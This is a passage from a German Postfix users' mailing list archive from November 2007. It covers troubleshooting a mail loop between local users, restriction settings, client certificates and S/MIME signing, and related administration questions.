smtpd_sender_restrictions = reject_unknown_address smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/postfix/mail.cert smtpd_tls_key_file = /etc/postfix/mail.key smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache soft_bounce = yes strict_rfc821_envelopes = yes /var/log/mail.info (auszug): Nov 5 16:22:41 localhost postfix/qmgr[9263]: 2E1B91D2A5: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 32C561CEB2: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 724561C86F: from=, size=414, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: EA7241CC25: from=, size=414, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 8A3541C999: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: B656B1C9CD: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 88FCA1C040: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 05C1E1CA14: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 026121D24B: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 543351D846: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: E64231D473: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 300F41CE8A: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 515D51C8B4: from=, size=414, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 249A71BD03: from=, size=9488, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 5E5301D7D9: from=, size=414, nrcpt=1 (queue active) Nov 5 16:22:41 localhost postfix/qmgr[9263]: 047A31CAD4: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 369871D575: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 8404B1CE11: from=, size=414, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 8B37E1D304: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 347611C9DA: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 223851D300: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 7A0F01CA5C: from=, size=405, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 50B9A1D61B: from=, size=414, nrcpt=1 (queue active) Nov 5 16:22:42 localhost postfix/qmgr[9263]: 7C08B1C878: from=, size=405, nrcpt=1 (queue active) Ich hoffe, Du kannst mir in der Sache helfen. Irgendwo treibt ein Zombie sein Spielchen mit mir. Danke From driessen at fblan.de Mon Nov 5 17:35:13 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 5 Nov 2007 17:35:13 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischenzwei lokale User In-Reply-To: <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> References: <472F1BEE.7000500@server1.office><472F307E.5020009@linuxrocks.dyndns.org> <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> Message-ID: <000901c81fc9$d7e58550$0565a8c0@uwe> max.muxe at maxxly.de schrieb: > > postconf: > mydestination = server1, server1.office, localhost.office, localhost > mydomain = office > myhostname = server1 > mynetworks = 192.168.121.0/24, 127.0.0.0/8 > myorigin = /etc/mailname > queue_minfree = 104857600 > recipient_canonical_maps = hash:/etc/postfix/canonical_recipient > recipient_delimiter = > relayhost = mail.taurus.hosting-agency.de > sender_canonical_maps = hash:/etc/postfix/canonical_sender Loop drinne ? > smtp_enforce_tls = no > smtp_sasl_auth_enable = yes > smtp_sasl_password_maps = hash:/etc/postfix/smtp_sasl_passwd > smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache > smtp_use_tls = yes > smtpd_banner = $myhostname ESMTP > smtpd_client_restrictions = reject_invalid_hostname > smtpd_helo_required = yes > smtpd_helo_restrictions = reject_invalid_hostname > smtpd_recipient_restrictions = permit_mynetworks, > reject_unlisted_recipient, reject_unknown_recipient_domain, > permit_sasl_authenticated, reject_unauth_destination Wie schon des öfteren smtp_mumble_restriktionen unter smtpd_recipient_restrictions zusammenfassen. > /var/log/mail.info (auszug): > Nov 5 16:22:41 localhost postfix/qmgr[9263]: 2E1B91D2A5: > from=, size=405, nrcpt=1 (queue active) > Nov 5 16:22:41 localhost postfix/qmgr[9263]: 32C561CEB2: > from=, size=405, nrcpt=1 (queue active) Bitte einen kompletten Transport aus dem logfile von, wer, wohin > > Ich hoffe, Du kannst mir in der Sache helfen. > Irgendwo treibt ein Zombie sein Spielchen mit mir. > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From driessen at fblan.de Mon Nov 5 17:40:42 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 5 Nov 2007 17:40:42 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <20071105145152.GA17591@mail.incertum.net> References: <472EF9E7.504@root2.schroederhost.de> <472F0CBA.3070503@thoma.cc><000301c81fa9$22d4e1d0$0565a8c0@uwe><472F1C5C.9050300@root2.schroederhost.de> <20071105145152.GA17591@mail.incertum.net> Message-ID: <000a01c81fca$9b580170$0565a8c0@uwe> > -----Original Message----- > From: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users- > bounces at listi.jpberlin.de] On Behalf Of Stefan Förster > Sent: Monday, November 05, 2007 3:52 PM > To: postfixbuch-users at listi.jpberlin.de > Subject: Re: [Postfixbuch-users] Amavis Fehler auf Deutsch > > * Sven Schmidt wrote: > > "Ein Virus (Eicar-Test-Signature) wurde gefunden. > > Benutzen Sie bitte kein Microsoft propritäres format. Senden Sie die > > Mail nochmal als reine Text-Mail! > > Scanner der einen Virus fand: ClamAV-clamd" > > Also, wenn das Kunden sind, die zahlen, wuerde ich diese Meldung (und > auch die anderen) evt. nochmal Korrekturlesen :-P Würde ich grundsätzlich empfehlen diese Dateien Korrektur zu lesen. Sind ja auch nur als Beispiel gedacht und nicht unbedingt für copi und paste. Was hier rennt und akzeptiert wird kann wo anders zu Problemen führen (ist wie immer) > > > Ciao > Stefan Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From marco at marcomartinez.de Mon Nov 5 18:19:02 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Mon, 05 Nov 2007 18:19:02 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <200711051435.06929.rainer.frey@inxmail.de> References: <472CC915.3020708@marcomartinez.de> <200711051435.06929.rainer.frey@inxmail.de> Message-ID: <472F5086.5090006@marcomartinez.de> Rainer Frey schrieb: > On Tuesday 30 October 2007 19:37:06 Marco Estrada Martinez wrote: > >> Hi @ all, >> >> Ich habe, wie man sehen kann ;o), postfix mit Clientzertifikaten >> eingerichtet. >> > > Was meinst du "Mit Client-Zertifikaten eingerichtet"? check_ccert_access > verwendet, oder was? > Ja, genau das, aber mir ist jetzt klar geworden das ich um den client gegenüvber dem Server auszuweisen für jeden client eins brauch. Danke schonmal dafür. Es würde also bedeuten ... Client 1: ZertifikatA -> Ausweisung client <->server ZertifikatB -> Digitale Unterschrift Client : ZertifikatC -> Ausweisung client <->server ZertifikatB -> Digitale Unterschrift Oder? > > Gruß > Rainer Frey > THX und liebe Grüße Marco -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From marco at marcomartinez.de Mon Nov 5 18:28:52 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Mon, 05 Nov 2007 18:28:52 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <20071104210501.GA13691@state-of-mind.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> <20071104173934.GC10692@state-of-mind.de> <472E0D22.4050300@marcomartinez.de> <20071104183929.GA11713@state-of-mind.de> <472E1879.6030002@marcomartinez.de> <20071104210501.GA13691@state-of-mind.de> Message-ID: <472F52D4.7060200@marcomartinez.de> Patrick Ben Koetter schrieb: > * Marco Estrada Martinez : > >>> Nein. Deiner User schreiben ihre Mail sicherlich nicht in Postfix oder >>> Sendmail, sondern sie nutzen Outlook oder Thunnderbird. Dort, in diesen >>> MUA, muß die Signierung oder Authentifizierung stattfinden. >>> >>> Ob das dann auf einem Laptop stattfindet und ob der dann noch zusätzlich >>> ein Postfix installiert hat, um die Mails nach >>> TLS-Clientzertifikat-Authentifizierung über ein zentrales Gateway zu >>> relayen, ist eine andere Sache. >>> >>> >>> >>>> mailserver (für jeden client eines) und ein zertifikat pro Person zum >>>> digitalen unterschreiben, Oder gibt es andere Vorgehen. >>>> >>>> >>> Von welcher Art Signatur sprichst Du eigentlich? Willst Du, das der Client >>> sich mit einem TLS-Zertifikat gegenüber dem Server ausweist und das im >>> Header vermerkt wird? >>> >>> Willst Du den Body der Mail signieren, damit die Urheberschaft vermerkt >>> ist? >>> >>> >> Mir wäre wichtig das der User (Person) die Mail signiert um die >> Urheberschaft "nachzuweisen". Also deine zweite Aussage. >> > > Das ist eine Aufgabe, die entweder von der Person im MUA wahrgenommen wird > (S/MIME, PGP, GnuPG) oder zentral im Krypto-Gateway. Produkte für > Krypto-Gateways musst Du ggf. selber recherchieren. > > Wenn Du im MUA signieren willst, hängt es vom Produkt ab welche > Signatur-Methode Du nutzen kannst. Zusätzlich bringt z.B. S/MIME üblicherweise > noch Kosten für Signierung der Zertifikate durch eine kommerzielle PKI mit > sich. > > Welche Mailclients mußt Du denn versorgen? > Hi, Eigentlich nur Thunderbird, OK könnte sein das sich darunter noch ein Outlook befindet (zwar schwer vorstellbar ;o)) THX Marco > p at rick > > > >> THX Marco >> >>> Oder willst Du pro Sender eine eigene DKIM-Signatur im Header der Mail >>> vermerken? >>> >>> p at rick >>> >>> >>> >>> >>> >>> >>>> THX & Grüße Marco >>>> >>>> >>>>> Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender >>>>> einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen and >>>>> einen >>>>> Envelope-Sender zu binden. >>>>> >>>>> TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber >>>>> deren >>>>> Verbreitung ist in Windows-Landschaften nicht der Regelfall. >>>>> >>>>> p at rick >>>>> >>>>> >>>>> >>>>> >>>> -- >>>> Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem >>>> folgenden Fingerprint: >>>> >>>> This mail is digitally signed, it is only valid with the following >>>> Fingerprint: >>>> >>>> MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C >>>> >>>> >>>> >>> >>> >>> >>>> -- >>>> _______________________________________________ >>>> Postfixbuch-users -- http://www.postfixbuch.de >>>> Heinlein Professional Linux Support GmbH >>>> >>>> Postfixbuch-users at listi.jpberlin.de >>>> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users >>>> >>>> >>> >>> >> -- >> Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem >> folgenden Fingerprint: >> >> This mail is digitally signed, it is only valid with the following >> Fingerprint: >> >> MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C >> >> > > > > >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listi.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users >> > > -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From fstoyan at swapon.de Mon Nov 5 19:03:41 2007 From: fstoyan at swapon.de (Friedemann Stoyan) Date: Mon, 05 Nov 2007 19:03:41 +0100 Subject: [Postfixbuch-users] mails von der Bash Shell mit Anhang versenden In-Reply-To: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> References: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> Message-ID: <472F5AFD.1050708@lab.swapon.de> Sven Neukirchner wrote: > echo "testmail" | /bin/mail -s 'nur ein Test' adresse at domain > > > Ich dächte ich hatte das schon mal mit der Option -a realisiert. echo "testmail" | nail -s 'nur ein Test' -a file adresse at domain mfg Friedemann From cite at incertum.net Mon Nov 5 19:14:41 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 5 Nov 2007 19:14:41 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... In-Reply-To: <472F3A50.2030606@japantest.homelinux.com> References: <20071105145232.244500@gmx.net> <472F3A50.2030606@japantest.homelinux.com> Message-ID: <20071105181441.GC17591@mail.incertum.net> * Sandy Drobic wrote: > smtp unix - - n - 30 smtp Es ist nicht die Fragestellung des OP, aber wie kann ich denn von diesen 30 "Delivery Slots" 20 für Nachrichten reservieren, bei denen das Queue-File (ich wollte nicht "die Mail" schreiben) weniger als $XYZ Bytes groß ist? Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #267: Giga - Teletubbies für Skriptkinder. (Joerg-Olaf Schaefers) From postfixbuch-users at japantest.homelinux.com Mon Nov 5 19:17:52 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Mon, 05 Nov 2007 19:17:52 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User In-Reply-To: <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> References: <472F1BEE.7000500@server1.office> <472F307E.5020009@linuxrocks.dyndns.org> <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> Message-ID: <472F5E50.5080102@japantest.homelinux.com> max.muxe at maxxly.de wrote: > Eine der mittlerweile hunderte Mails in Quelle: > > Return-Path: > X-Original-To: max.muxe at server1.office > Delivered-To: max.muxe at server1.office > Received: from localhost (localhost [127.0.0.1]) > by server1 (Postfix) with ESMTP id 97A1E1BD9A > for ; Mon, 5 Nov 2007 16:22:29 +0100 (CET) > X-Spam-Score: 2.008 > X-Spam-Level: ** > X-Spam-Status: No, score=2.008 tagged_above=2 required=6.31 tests=[AWL=-0.464, > BAYES_40=-0.185, MISSING_SUBJECT=1.816, UNDISC_RECIPS=0.841] > Received: from server1 ([127.0.0.1]) > by localhost (localhost [127.0.0.1]) (amavisd-new, port 10024) > with ESMTP id GjVTaLb3wz+d for ; > Mon, 5 Nov 2007 16:22:29 +0100 (CET) > Received: by server1 (Postfix, from userid 1002) > id 55FFF1CC52; Mon, 5 Nov 2007 07:34:29 +0100 (CET) > Delivered-To: unknown > Received: from mail.hosting-agency.de (194.145.226.10) by localhost with > IMAP4; 05 Nov 2007 06:34:29 -0000 > Message-Id: <20071105065202.55FFF1CC52 at server1> > Date: Mon, 5 Nov 2007 07:34:29 +0100 (CET) > From: max at server1.office (Max Muxe) > To: undisclosed-recipients:; Dieser Mail scheint ja ausgeliefert worden zu sein. > server1:/etc/postfix# postconf -n > alias_database = hash:/etc/aliases > alias_maps = hash:/etc/aliases > append_dot_mydomain = no > biff = no > broken_sasl_auth_clients = yes > config_directory = /etc/postfix > delay_warning_time = 4h > home_mailbox = Maildir/ > inet_interfaces = all > inet_protocols = all > mailbox_size_limit = 1048576000 > maximal_queue_lifetime = 5d > message_size_limit = 10485760 > mydestination = server1, server1.office, localhost.office, localhost > mydomain = office > myhostname = server1 keine vollständigen Namen in diesen beiden Parametern lädt zu Ärger fast ein. > mynetworks = 192.168.121.0/24, 127.0.0.0/8 > myorigin = /etc/mailname Was steht in /etc/mailname? > queue_minfree = 104857600 > recipient_canonical_maps = hash:/etc/postfix/canonical_recipient > recipient_delimiter = > relayhost = mail.taurus.hosting-agency.de > sender_canonical_maps = hash:/etc/postfix/canonical_sender > smtp_enforce_tls = no > smtp_sasl_auth_enable = yes > smtp_sasl_password_maps = hash:/etc/postfix/smtp_sasl_passwd > smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache > smtp_use_tls = yes > smtpd_banner = $myhostname ESMTP > smtpd_client_restrictions = reject_invalid_hostname > smtpd_helo_required = yes > smtpd_helo_restrictions = reject_invalid_hostname > smtpd_recipient_restrictions = permit_mynetworks, > reject_unlisted_recipient, reject_unknown_recipient_domain, > permit_sasl_authenticated, reject_unauth_destination > smtpd_sasl_auth_enable = yes > smtpd_sasl_local_domain = $myhostname > smtpd_sasl_security_options = noanonymous > smtpd_sender_restrictions = reject_unknown_address Besser: smtpd_client_restrictions = smtpd_helo_restrictions = smtpd_recipient_restrictions = permit_mynetworks, reject_unlisted_recipient, permit_sasl_authenticated, reject_unauth_destination reject_invalid_hostname > smtpd_tls_auth_only = yes > smtpd_tls_cert_file = /etc/postfix/mail.cert > smtpd_tls_key_file = /etc/postfix/mail.key > smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache > soft_bounce = yes > strict_rfc821_envelopes = yes > > > /var/log/mail.info (auszug): > Nov 5 16:22:41 localhost postfix/qmgr[9263]: 2E1B91D2A5: > from=, size=405, nrcpt=1 (queue active) > Nov 5 16:22:41 localhost postfix/qmgr[9263]: 32C561CEB2: Das ist nur der Anfang. Sinnvoller ist die Suche nach Fehlermeldungen im Log, insbesondere die ersten Fehlermeldungen sind meisten am aufschlußreichsten. egrep "(panic|fatal|error|warning)" /var/log/mail.log Wenn dein Maillog aufgesplittert ist in mail.err, mail.warn und mail, dann schau in mail.err und mail.warn nach. Schau auch nach, was in den Queuefiles steht. Du kannst sie dir mit "postcat -q queue-id" anzeigen. Die queue-id wird mit dem Befehl "mailq" gezeigt. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From postfixbuch-users at japantest.homelinux.com Mon Nov 5 19:23:49 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Mon, 05 Nov 2007 19:23:49 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... In-Reply-To: <20071105181441.GC17591@mail.incertum.net> References: <20071105145232.244500@gmx.net> <472F3A50.2030606@japantest.homelinux.com> <20071105181441.GC17591@mail.incertum.net> Message-ID: <472F5FB5.1010207@japantest.homelinux.com> Stefan Förster wrote: > * Sandy Drobic wrote: >> smtp unix - - n - 30 smtp > > Es ist nicht die Fragestellung des OP, aber wie kann ich denn von > diesen 30 "Delivery Slots" 20 für Nachrichten reservieren, bei denen > das Queue-File (ich wollte nicht "die Mail" schreiben) weniger als > $XYZ Bytes groß ist? Nur, indem du einen Policyserver verwendest, der bei kleinerer Größe einen entsprechenden Transport als FILTER=schneller-transport-smtp Ergebnis zurückmeldet. wobei dies immer noch nicht sicherstellt, dass von diesen 30 dann 20 genommen werden. Du kannst natürlich den normalen smtp auf 10 reduzieren und dann den schneller-transport-smtp auf 20 Instanzen setzen. Mit dem Risiko, dass vielleicht nur 10 Instanzen Mails senden, wenn keine Mails größer als $XYZ Bytes in der Queue sind. Bei geringer Bandbreite wie den 128 kBit des OP wäre das vielleicht keine schlechte Idee. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From ml at awinkelmann.de Mon Nov 5 19:23:14 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 5 Nov 2007 19:23:14 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... In-Reply-To: <20071105181441.GC17591@mail.incertum.net> References: <20071105145232.244500@gmx.net> <472F3A50.2030606@japantest.homelinux.com> <20071105181441.GC17591@mail.incertum.net> Message-ID: <200711051923.14800.ml@awinkelmann.de> On Montag, 5. November 2007, Stefan Förster wrote: > > smtp unix - - n - 30 smtp > > Es ist nicht die Fragestellung des OP, aber wie kann ich denn von > diesen 30 "Delivery Slots" 20 für Nachrichten reservieren, bei denen > das Queue-File (ich wollte nicht "die Mail" schreiben) weniger als > $XYZ Bytes groß ist? smtp-small .... 20 smtp smtp-big ... 10 smtp nem Policy-Server ( http://www.postfix.org/SMTPD_POLICY_README.html ) und ner FILTER:-Action ( http://www.postfix.org/access.5.html ) könnte es klappen. -- Andreas From cite at incertum.net Mon Nov 5 19:26:34 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 5 Nov 2007 19:26:34 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... In-Reply-To: <472F5FB5.1010207@japantest.homelinux.com> References: <20071105145232.244500@gmx.net> <472F3A50.2030606@japantest.homelinux.com> <20071105181441.GC17591@mail.incertum.net> <472F5FB5.1010207@japantest.homelinux.com> Message-ID: <20071105182633.GA10044@mail.incertum.net> * Sandy Drobic wrote: > Mit dem Risiko, dass vielleicht nur 10 Instanzen Mails senden, wenn keine > Mails größer als $XYZ Bytes in der Queue sind. *seufz* Dann hab ichs ja doch nicht verbockt gehabt, es geht nur nicht so einfach, wie ich gehofft hatte. Case closed, Danke. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #123: Sprache - Ein Dialekt, der eine Akademie und eine Armee besitzt. (Harvard-Prof. Edward Keenan) From ml at awinkelmann.de Mon Nov 5 19:33:25 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 5 Nov 2007 19:33:25 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?DINGENDE_Hilfe=3A_Mail_pendelt?= =?iso-8859-1?q?_zwischen=09zwei_lokale_User?= In-Reply-To: <472F5E50.5080102@japantest.homelinux.com> References: <472F1BEE.7000500@server1.office> <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> <472F5E50.5080102@japantest.homelinux.com> Message-ID: <200711051933.25543.ml@awinkelmann.de> On Montag, 5. November 2007, Sandy Drobic wrote: > > Received: by server1 (Postfix, from userid 1002) > > id 55FFF1CC52; Mon, 5 Nov 2007 07:34:29 +0100 (CET) > > Received: from mail.hosting-agency.de (194.145.226.10) by localhost with > > IMAP4; 05 Nov 2007 06:34:29 -0000 > > /var/log/mail.info (auszug): > > Nov 5 16:22:41 localhost postfix/qmgr[9263]: 2E1B91D2A5: > > from=, size=405, nrcpt=1 (queue active) > > Nov 5 16:22:41 localhost postfix/qmgr[9263]: 32C561CEB2: > > Das ist nur der Anfang. Sinnvoller ist die Suche nach Fehlermeldungen im > Log, insbesondere die ersten Fehlermeldungen sind meisten am > aufschlußreichsten. Vielleicht gibt es gar keine Fehlermeldungen. Der OP sollte nach dem Ursprung der Queue-Ids suchen. # grep 2E1B91D2A5 /path/to/maillog # grep 32C561CEB2 /path/to/maillog "Recieved: ... by localhost with IMAP4" könnte auf einen verrückt spielenden IMAP-Client deuten. Der OP könnte mal prüfen wer User-Id 1002 auf seinem System hat. # getent passwd 1002 -- Andreas From ml at awinkelmann.de Mon Nov 5 19:35:56 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Mon, 5 Nov 2007 19:35:56 +0100 Subject: [Postfixbuch-users] procmailzustellung mit cyradmin In-Reply-To: <000001c81f81$2f4a4d60$96ffa8c0@nicos.local> References: <000001c81f81$2f4a4d60$96ffa8c0@nicos.local> Message-ID: <200711051935.56680.ml@awinkelmann.de> On Montag, 5. November 2007, Sven Neukirchner wrote: > Stimmt, ich meine natürlich: > > "/usr/sbin/cyrdeliver -a shared.Faxeingang" -a passt nicht. > Und hier ein Auszug aus dem Logfile: > > procmail: Assigning "FAXBOX=/usr/sbin/cyrdeliver -a shared.Faxeingang" > procmail: Match on "^To.*fax at mydomain" > procmail: Executing "/usr/sbin/cyrdeliver,-a,shared.Faxeingang" > 421-4.3.0 usage: cyrdeliver [-C ] [-m mailbox] [-a auth] [-r > return_path] [-l] [-D] ... und das sagt er Dir auch. -m wäre wohl passender. > 421 4.3.0 v2.2.13-Debian-2.2.13-10 > procmail: Program failure (75) of "/usr/sbin/cyrdeliver" > procmail: Assigning "LASTFOLDER=/usr/sbin/cyrdeliver -a shared.Faxeingang" > > Hier die Rechte für shared.Faxeingang: > > lam shared.Faxeingang > anyone lrswipcda -- Andreas From max.muxe at maxxly.de Mon Nov 5 19:51:38 2007 From: max.muxe at maxxly.de (max.muxe at maxxly.de) Date: Mon, 05 Nov 2007 19:51:38 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User In-Reply-To: <472F5E50.5080102@japantest.homelinux.com> References: <472F1BEE.7000500@server1.office> <472F307E.5020009@linuxrocks.dyndns.org> <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> <472F5E50.5080102@japantest.homelinux.com> Message-ID: <20071105195138.hwaj208uoccg4gcs@www.hosting-agency.de> Hallo Sandy, Zitat von Sandy Drobic : > max.muxe at maxxly.de wrote: > >> Eine der mittlerweile hunderte Mails in Quelle: [...] > > Dieser Mail scheint ja ausgeliefert worden zu sein. > [...] >> mydomain = office >> myhostname = server1 > > keine vollständigen Namen in diesen beiden Parametern lädt zu Ärger fast ein. Das habe ich geändert. > >> mynetworks = 192.168.121.0/24, 127.0.0.0/8 >> myorigin = /etc/mailname > > Was steht in /etc/mailname? server1.office [...] > > Besser: > smtpd_client_restrictions = > smtpd_helo_restrictions = > smtpd_recipient_restrictions = > permit_mynetworks, > reject_unlisted_recipient, > permit_sasl_authenticated, > reject_unauth_destination > reject_invalid_hostname Das habe ich von Dir übernommen. [...] >> Es geht weiter so ;-) >> /var/log/mail.info (auszug): >> Nov 5 16:22:41 localhost postfix/qmgr[9263]: 2E1B91D2A5: >> from=, size=405, nrcpt=1 (queue active) >> Nov 5 16:22:41 localhost postfix/qmgr[9263]: 32C561CEB2: > > Das ist nur der Anfang. Sinnvoller ist die Suche nach Fehlermeldungen im > Log, insbesondere die ersten Fehlermeldungen sind meisten am > aufschlußreichsten. > > egrep "(panic|fatal|error|warning)" /var/log/mail.log > ein .../postfix check gibt postsuper: warning: bogus file name: incoming/581993.10323 postsuper: warning: bogus file name: incoming/942374.6141 postsuper: warning: bogus file name: incoming/635110.4672 postsuper: warning: bogus file name: incoming/695550.9678 Ich kann mich erinnern, dass ich vor einigen Wochen Ärger wegen einer Mail mit etlichen MB Attachment hatte. Ich habe daraufhin bestimmte Mails (Spam) per Hand gelöscht. Könnte der heutige Mist aus dieser Aktion stammen? Und wie löst man so etwas? > Wenn dein Maillog aufgesplittert ist in mail.err, mail.warn und mail, dann > schau in mail.err und mail.warn nach. > mail.err zeigt nur sehr alte Fehler. mail.warn zeigt Ähnliches wie .../postfix check: Nov 5 07:26:25 localhost postfix/postsuper[14763]: warning: bogus file name: incoming/994901.12966 Nov 5 07:26:25 localhost postfix/postsuper[14763]: warning: bogus file name: incoming/831819.18403 Nov 5 07:26:25 localhost postfix/postsuper[14763]: warning: bogus file name: incoming/729913.11543 Nov 5 07:26:33 localhost postfix/postsuper[14922]: fatal: invalid directory name: - Nov 5 07:26:38 localhost postfix/postsuper[14995]: warning: bogus file name: incoming/553802.11360 Nov 5 07:26:38 localhost postfix/postsuper[14995]: warning: bogus file name: incoming/994901.12966 Nov 5 07:26:38 localhost postfix/postsuper[14995]: warning: bogus file name: incoming/831819.18403 Nov 5 07:26:38 localhost postfix/postsuper[14995]: warning: bogus file name: incoming/729913.11543 Nov 5 07:44:23 localhost postfix/qmgr[2768]: warning: backward time jump detected -- slewing clock Nov 5 07:44:24 localhost postfix/qmgr[2768]: warning: backward time jump recovered -- back to normality Nov 5 14:13:07 localhost postfix/qmgr[2577]: warning: backward time jump detected -- slewing clock Nov 5 14:13:08 localhost postfix/qmgr[2577]: warning: backward time jump recovered -- back to normality Nov 5 19:33:51 localhost postfix/postsuper[10382]: warning: bogus file name: incoming/581993.10323 Nov 5 19:33:51 localhost postfix/postsuper[10382]: warning: bogus file name: incoming/942374.6141 Nov 5 19:33:51 localhost postfix/postsuper[10382]: warning: bogus file name: incoming/635110.4672 Nov 5 19:33:51 localhost postfix/postsuper[10382]: warning: bogus file name: incoming/695550.9678 Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus file name: incoming/581993.10323 Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus file name: incoming/942374.6141 Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus file name: incoming/635110.4672 Nov 5 19:41:47 localhost postfix/postsuper[10461]: warning: bogus file name: incoming/695550.9678 > Schau auch nach, was in den Queuefiles steht. Du kannst sie dir mit > "postcat -q queue-id" anzeigen. > Die queue-id wird mit dem 